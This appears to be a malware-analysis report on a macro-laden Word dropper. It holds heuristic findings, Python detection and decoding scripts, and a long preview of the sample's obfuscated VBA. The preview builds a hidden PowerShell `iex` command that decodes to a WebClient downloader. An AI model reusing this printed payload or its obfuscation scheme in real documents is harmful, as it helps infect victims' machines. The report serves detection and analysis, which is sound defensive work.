Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. Its AutoOpen entry point leads to a Shell() call that launches PowerShell. The PowerShell command is not present in clear text: the extracted source assembles it from dozens of short string fragments concatenated across several functions (the `VdwNdzN = "OwerSHe" + "ll &((vARIA" + ...` lines in the preview), interleaved with dead-code assignments (CDate, Sin and CByte calls whose results are never used) under `On Error Resume Next` so that the junk never raises. The visible fragments build `&((variable '*MDr*').Name[3,11,2] -join '') ([string]::Join('', (<integer array>)))`: the wildcard matches the MaximumDriveCount preference variable and characters 3, 11 and 2 of its name spell `iex`, so whatever the array decodes to is executed. Treating the visible part of the array as single-byte XOR (key 0x18, inferred from the first element having to decode to `$`) yields a script that creates a System.Net.WebClient and begins an `@`-separated list of download URLs; the rest of the list lies beyond the truncated preview. This indicates downloader or dropper functionality.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6584888-0 | critical | CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6584888-0
- VBA macros detected | medium | OLE_VBA_MACROS (3 related findings): Document contains VBA macro code
- Shell() call in VBA | critical | OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro | high | OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable. (For this sample the source was recovered as well, so this finding corroborates the two source-level findings above rather than standing alone.)
- Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (The canned wording does not match this sample, in which a VBA project was recovered and decoded; read the marker as the same AutoOpen entry point seen by a second signature, not as a separate execution path.)
- Embedded URL | info | EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office files and is not a network indicator; the download URLs of this sample are encoded inside the macro and are therefore not extracted as plain-text URLs.
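The findings above rest on two rules: an auto-execution entry point co-occurring with an execution token (Shell, CreateObject, WScript.Shell), and the string-obfuscation style visible in the extracted source. The following Python script is an added example, not part of this report or of the analyzer, that applies the same rules to decompressed VBA source. It is run on a constructed module that reuses fragment lines from the preview below plus a hypothetical AutoOpen/Shell launcher (the real launcher lies past the truncated part of the preview), and on a constructed benign AutoOpen macro. The finding ids mirror the report's names but are this example's own.

```python
import re

# Constructed input: fragment lines copied from the macro preview, plus a
# hypothetical launcher sub (the sample's real launcher is not in the preview).
MALICIOUS_SAMPLE = '''Attribute VB_Name = "lijbaJnZ"
Function rpLANBUlZ()
On Error Resume Next
VdwNdzN = "OwerSHe" + "ll &((vARIA" + "bLe '*MDr" + "*'" + ").NaME[3,11,2]" + "-JOiN''" + ") ( [st" + "RiNG]::JOIN("
FkILuSKpK = "'' , (( 6" + "0, 124" + ",115," + "108,79"
SOJPqLUJJM = ",80 , 79 , 56" + " , 37 " + ",56 , 118 , 125" + " , 111 "
fktIQkdEF = ",53 , 11" + "9, 122, " + "114 ,125,123,10" + "8 ,56 " + ", "
pZSPo = "106 ,121, " + "118, 124" + " , 119 ," + " 117 ,35,"
rpLANBUlZ = VdwNdzN + FkILuSKpK + SOJPqLUJJM + fktIQkdEF + pZSPo
End Function
Sub AutoOpen()
On Error Resume Next
Shell "P" + rpLANBUlZ(), 0
End Sub
'''

# Constructed benign macro: auto-exec entry point, but nothing leaves VBA.
BENIGN_SAMPLE = '''Sub AutoOpen()
    ActiveDocument.Sections(1).Headers(1).Range.Text = "Draft - " & Format(Date, "yyyy-mm-dd")
End Sub
'''

# Auto-execution entry points (the names olevba also keys on, Word and Excel).
AUTOEXEC_RE = re.compile(
    r"\b(AutoOpen|Auto_Open|AutoExec|AutoClose|Auto_Close|Document_Open|"
    r"Document_Close|Workbook_Open|Workbook_Activate)\b", re.I)
# Tokens that hand control to something outside the VBA runtime.
EXEC_RE = re.compile(
    r"\b(Shell)\b\s*[(\"]|\b(CreateObject)\s*\(|(WScript\.Shell)|(ShellExecute)|"
    r"(powershell)|(cmd\.exe)", re.I)


def triage(vba_source):
    """Return (verdict, findings) for one module's decompressed source.

    Finding ids are this example's own names, chosen to mirror the report's."""
    findings = []
    auto = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(vba_source)}, key=str.lower)
    execs = sorted({next(g for g in m.groups() if g) for m in EXEC_RE.finditer(vba_source)},
                   key=str.lower)
    if auto:
        findings.append(("OLE_VBA_AUTOOPEN", "high", auto))
    if execs:
        findings.append(("OLE_VBA_SHELL", "critical", execs))
    # Obfuscation 1: lines that glue several short literals together with '+'.
    chains = [ln for ln in vba_source.splitlines() if ln.count('" + "') >= 3]
    if chains:
        findings.append(("VBA_STRING_CONCAT_CHAIN", "medium", len(chains)))
    # Obfuscation 2: decimal character codes hidden inside string literals.
    # Literals are joined per line first so a number split across two literals counts once.
    ints = 0
    for ln in vba_source.splitlines():
        joined = "".join(re.findall(r'"([^"]*)"', ln))
        ints += len(re.findall(r"\b\d{1,3}\b", joined))
    if ints >= 20:
        findings.append(("VBA_CHARCODE_ARRAY", "medium", ints))
    if re.search(r"\bOn Error Resume Next\b", vba_source, re.I):
        findings.append(("VBA_ERROR_SUPPRESSION", "low", True))
    # Same co-occurrence rule the p-code heuristic uses: entry point + execution token.
    if auto and execs:
        verdict = "likely-malicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return verdict, findings


if __name__ == "__main__":
    for name, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        verdict, findings = triage(src)
        print(f"{name}: {verdict}")
        for fid, sev, detail in findings:
            print(f"  {fid:<24} {sev:<8} {detail}")
```

On the constructed malicious module this yields `likely-malicious` with the entry point, the Shell call, five concatenation-chain lines and 31 embedded character codes; the benign header macro yields `review` on the AutoOpen name alone, which is the right outcome, since an auto-exec name by itself is a keyword hit and not a verdict. Run the same function over every module in macros.bas, not just the first, because launchers are routinely placed in a module other than the one holding the payload strings.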
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15127 bytes | e6ee61016c71cc733d04cad4216f275a65e606d8787745ca33763c44f9c1e9e6 |
Preview: first 1,000 lines of the extracted script (this capture is cut off after roughly 120 lines)
Attribute VB_Name = "AouiwtSpf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lijbaJnZ"
Function rpLANBUlZ()
On Error Resume Next
BzSPUM = 49353
WfFFrn = kFBmPU
NzMahG = CDate(kuDnQZ + Sin(88118 + 5063) * 75463 * CInt(10236))
QipucK = 73371
rpkTG = CByte(TMNKAL)
ANDut = CDate(93208)
VdwNdzN = "OwerSHe" + "ll &((vARIA" + "bLe '*MDr" + "*'" + ").NaME[3,11,2]" + "-JOiN''" + ") ( [st" + "RiNG]::JOIN("
BjSJX = 68740
Dwwho = ipzHl
EIKuEW = CDate(WnhQOw + Sin(55649 + 6761) * 24172 * CInt(34377))
aLjuYp = 30132
czazEW = CByte(lHGYc)
BuzijM = CDate(158)
FkILuSKpK = "'' , (( 6" + "0, 124" + ",115," + "108,79"
zAnOU = 46895
RAaICi = BUJrki
GFiEEO = CDate(OQDLhN + Sin(30147 + 92699) * 39076 * CInt(84386))
dURCj = 87509
OzYqk = CByte(SIBuW)
GLOWV = CDate(71163)
SOJPqLUJJM = ",80 , 79 , 56" + " , 37 " + ",56 , 118 , 125" + " , 111 "
cnwBF = 81024
zOiOtu = AooQj
Dswtkw = CDate(oMbGw + Sin(85364 + 74101) * 84612 * CInt(31275))
bVjzJ = 32591
JEJrW = CByte(EkZwCv)
DtnXf = CDate(47966)
fktIQkdEF = ",53 , 11" + "9, 122, " + "114 ,125,123,10" + "8 ,56 " + ", "
QHYoP = 44868
NDDqT = TbXKOw
QudbJj = CDate(puzWwa + Sin(88365 + 70288) * 43341 * CInt(10024))
LzHqI = 78414
rGDSLc = CByte(XRqiKz)
twJrFM = CDate(1190)
pZSPo = "106 ,121, " + "118, 124" + " , 119 ," + " 117 ,35,"
TEfcwf = 76537
wbKJM = aQhKc
wTDbh = CDate(nIYbt + Sin(76930 + 21342) * 33851 * CInt(43464))
szBwpc = 4660
EzLnm = CByte(zzjZbi)
iLhaz = CDate(80187)
iKkDOGCidZs = " 60, 77" + ",73, 1" + "13," + " 113 ," + " 85 , 56,37" + ",56, 118,125, 1"
vjFRMq = 48609
YEOCLJ = DqHphX
vwiPlc = CDate(WtzVa + Sin(40041 + 69359) * 87415 * CInt(82249))
Zwikp = 70935
jnTqM = CByte(iznfzw)
nuXtCQ = CDate(50791)
OiQhtUsnM = "11 ,5" + "3 ,119,1" + "22 , 114" + ", 125 ,123 ," + "108 ,56" + " ,75 ,97 ,1" + "07, 108 ,125,1"
aLUcti = 56623
QfOnG = AfPiq
cpzEFK = CDate(tuZRaz + Sin(61378 + 34230) * 7410 * CInt(76291))
nYvhvj = 8315
ZDBjH = CByte(LLYkoF)
vVZoV = CDate(75020)
BlBtVr = "17 , 5" + "4 , 86,12" + "5 , 108 , 54" + ", 79, 125, " + "122 ,"
rpLANBUlZ = VdwNdzN + FkILuSKpK + SOJPqLUJJM + fktIQkdEF + pZSPo + iKkDOGCidZs + OiQhtUsnM + BlBtVr
End Function
Function JBUApuJiu()
On Error Resume Next
azfSQw = 35829
IASoz = zFtAC
iSkizq = CDate(TAvWIh + Sin(73218 + 50390) * 69578 * CInt(3045))
PQMZj = 75188
FfdRm = CByte(FHhojw)
auTDA = CDate(72636)
zKKkwGcHAr = "91, 116, 1" + "13 , 12" + "5,118, 108,35" + " , 6" + "0, 93,76,95, 11" + "7, 10" + "4, 7" + "8 ,56,3"
uRvNmG = 73649
AsulYb = tURLXz
jFvICn = CDate(GHMmjh + Sin(25769 + 77015) * 48366 * CInt(77794))
VTGMiI = 29361
aQSAK = CByte(islaq)
diuzZ = CDate(31415)
DFQhkD = "7, 56, 6" + "3 , 1" + "12,108, 108," + "104 , 3" + "4,55 ,55 ,11" + "9 , 1" + "18" + " , 108,10" + "6 ,121 ," + " 12"
VKWfw = 87919
BRbOza = fJwFu
KOHbuj = CDate(nWkOs + Sin(54923 + 10031) * 71254 * CInt(29332))
PnQzit = 96050
FpJFW = CByte(XsuhU)
JSXvj = CDate(28251)
dthanjmwMhv = "3,115" + ", 107, 1" + "19, 116 ,109, " + "108 ,11"
PZKlB = 16715
VVdPW = BSisE
cWrRNm = CDate(QdwSiq + Sin(33833 + 89102) * 64231 * CInt(82608))
coFNPi = 63898
osEYDu = CByte(RnjMnw)
khFtYU = CDate(52533)
bRvPOdIKXY = "3 " + ", 119 , 118, " + "107 ,54" + " ,123 ,11"
jGZWGQ = 41565
jpIpz = ChwWl
ZdCMAE = CDate(PvHJF + Sin(70414 + 69887) * 25910 * CInt(22857))
ZKUwrs = 54205
FSmYC = CByte(wGzNA)
PvHALl = CDate(38500)
SNqbL = "9 ,117 ,5" + "5 , 47, 46, " + "47, 93 , 1" + "27," + "113, 11" + "2 , 55, 8" + "8 , 11" + "2,108, "
aYzzj = 19683
DifZk = ROQwU
oJsslv = CDate(HsKFoY + Sin(96776 + 76418) * 92171 * CInt(83609))
MTnuP = 69819
DuAfhv = CByte(fvLoaN)
iDilP = CDate(42999)
QCXStUCiQ = "108 ,104 ,34 ," + "55" + " ,55 ,111,11" + "1 , 1"
mwAQX = 6058
ZOGMYi = wiAKR
dwmBdi = CDate(oEHCO + Sin(15333 + 42636) * 66710 * CInt(39691))
ZWijZ = 6354
iloBq = CByte(qhMrQ)
ZpaWi = CDate(65484
... (truncated)
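What the preview actually builds. The following Python script is an added example (not the analyzer's code and not from the sample) that rebuilds the PowerShell command line from the string-building lines copied from the preview above, resolves the `(variable '*MDr*').Name[3,11,2] -join ''` trick against the real PowerShell preference variables without running PowerShell, and XOR-decodes the character-code array. Its assumptions are labelled in the code: the fragments are concatenated in assignment order (as the visible `rpLANBUlZ = VdwNdzN + FkILuSKpK + ...` line does; the corresponding line of JBUApuJiu is past the truncation), the decoded script starts with `$` so the key is the first element XOR 0x24, and the final partial number is dropped because the preview is cut mid-literal. The key and the decoded text are produced by running the code, not read from the report.

```python
import re
from fnmatch import fnmatchcase

# Constructed input: the string-building lines copied verbatim from the macro
# preview (rpLANBUlZ first, then JBUApuJiu, in source order). The CDate/Sin/CByte
# filler lines are omitted because they contribute nothing to the result.
FRAGMENT_LINES = '''
VdwNdzN = "OwerSHe" + "ll &((vARIA" + "bLe '*MDr" + "*'" + ").NaME[3,11,2]" + "-JOiN''" + ") ( [st" + "RiNG]::JOIN("
FkILuSKpK = "'' , (( 6" + "0, 124" + ",115," + "108,79"
SOJPqLUJJM = ",80 , 79 , 56" + " , 37 " + ",56 , 118 , 125" + " , 111 "
fktIQkdEF = ",53 , 11" + "9, 122, " + "114 ,125,123,10" + "8 ,56 " + ", "
pZSPo = "106 ,121, " + "118, 124" + " , 119 ," + " 117 ,35,"
iKkDOGCidZs = " 60, 77" + ",73, 1" + "13," + " 113 ," + " 85 , 56,37" + ",56, 118,125, 1"
OiQhtUsnM = "11 ,5" + "3 ,119,1" + "22 , 114" + ", 125 ,123 ," + "108 ,56" + " ,75 ,97 ,1" + "07, 108 ,125,1"
BlBtVr = "17 , 5" + "4 , 86,12" + "5 , 108 , 54" + ", 79, 125, " + "122 ,"
zKKkwGcHAr = "91, 116, 1" + "13 , 12" + "5,118, 108,35" + " , 6" + "0, 93,76,95, 11" + "7, 10" + "4, 7" + "8 ,56,3"
DFQhkD = "7, 56, 6" + "3 , 1" + "12,108, 108," + "104 , 3" + "4,55 ,55 ,11" + "9 , 1" + "18" + " , 108,10" + "6 ,121 ," + " 12"
dthanjmwMhv = "3,115" + ", 107, 1" + "19, 116 ,109, " + "108 ,11"
bRvPOdIKXY = "3 " + ", 119 , 118, " + "107 ,54" + " ,123 ,11"
SNqbL = "9 ,117 ,5" + "5 , 47, 46, " + "47, 93 , 1" + "27," + "113, 11" + "2 , 55, 8" + "8 , 11" + "2,108, "
QCXStUCiQ = "108 ,104 ,34 ," + "55" + " ,55 ,111,11" + "1 , 1"
'''

# Real PowerShell preference variables; (variable '*MDr*') wildcard-matches one of them.
PS_PREFERENCE_VARIABLES = [
    "MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
    "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount",
]


def concat_fragments(vba_text):
    """Rebuild each 'name = "a" + "b" + ...' line and join the results in source order.
    Assumption: the macro concatenates the variables in assignment order, which is
    what the visible 'rpLANBUlZ = VdwNdzN + FkILuSKpK + ...' line does."""
    out = []
    for line in vba_text.splitlines():
        m = re.match(r'\s*\w+\s*=\s*(".*)$', line)
        if m:
            out.append("".join(re.findall(r'"([^"]*)"', m.group(1))))
    return "".join(out)


def resolve_variable_name_trick(pattern, indices, names=PS_PREFERENCE_VARIABLES):
    """Emulate (variable '<pattern>').Name[i,j,k] -join '' without PowerShell."""
    hits = [n for n in names if fnmatchcase(n.lower(), pattern.lower())]
    if len(hits) != 1:
        raise ValueError(f"{pattern!r} matched {hits}, expected exactly one name")
    return "".join(hits[0][i] for i in indices)


def extract_char_codes(ps_text, truncated):
    """Integers handed to [string]::Join('', (...)). With truncated=True the last
    number is dropped because the preview ends in the middle of a literal."""
    m = re.search(r"::join\(", ps_text, re.I)
    tail = ps_text[m.end():]
    codes = [int(n) for n in re.findall(r"\d+", tail)]
    if truncated and tail.rstrip()[-1:].isdigit():
        codes = codes[:-1]
    return codes


def infer_xor_key(codes, first_char="$"):
    """Assumption: the decoded script starts with a PowerShell variable, so the
    first element XORs to '$'. Every key giving all-printable output is also
    returned so an analyst can review alternatives when that assumption fails."""
    key = codes[0] ^ ord(first_char)
    candidates = [k for k in range(256) if all(32 <= (c ^ k) < 127 for c in codes)]
    return key, candidates


def xor_decode(codes, key):
    return "".join(chr(c ^ key) for c in codes)


def analyze(vba_text=FRAGMENT_LINES, truncated=True):
    ps = concat_fragments(vba_text)
    launcher = ps.split("::")[0]  # everything before [string]::Join
    m = re.search(r"variable\s+'([^']+)'\)\.name\[([\d,\s]+)\]", ps, re.I)
    cmdlet = resolve_variable_name_trick(m.group(1), [int(i) for i in m.group(2).split(",")]) if m else None
    codes = extract_char_codes(ps, truncated)
    key, candidates = infer_xor_key(codes)
    return {"launcher": launcher, "cmdlet": cmdlet, "xor_key": key,
            "other_printable_keys": [k for k in candidates if k != key],
            "decoded": xor_decode(codes, key)}


if __name__ == "__main__":
    r = analyze()
    print(f"launcher : {r['launcher']}")
    print(f"cmdlet   : {r['cmdlet']}  (via the *MDr* variable-name trick)")
    print(f"xor key  : {r['xor_key']} (0x{r['xor_key']:02x}); other all-printable keys: {r['other_printable_keys']}")
    print(f"decoded  : {r['decoded']}")
```

Running it prints the launcher (`OwerSHell &((vARIAbLe '*MDr*').NaME[3,11,2]-JOiN'') ( [stRiNG]`; the leading P is presumably supplied by a fragment outside the preview), the cmdlet `iex`, key 24 (0x18), and a decoded script that creates a `new-object random`, a `new-object System.Net.WebClient` and the start of an `@`-separated list of download URLs, the usual shape of a WebClient downloader. The list stops where the preview does; re-run over the full macros.bas for the complete set. If the first-byte assumption is wrong for another sample, `other_printable_keys` lists every key worth trying by hand.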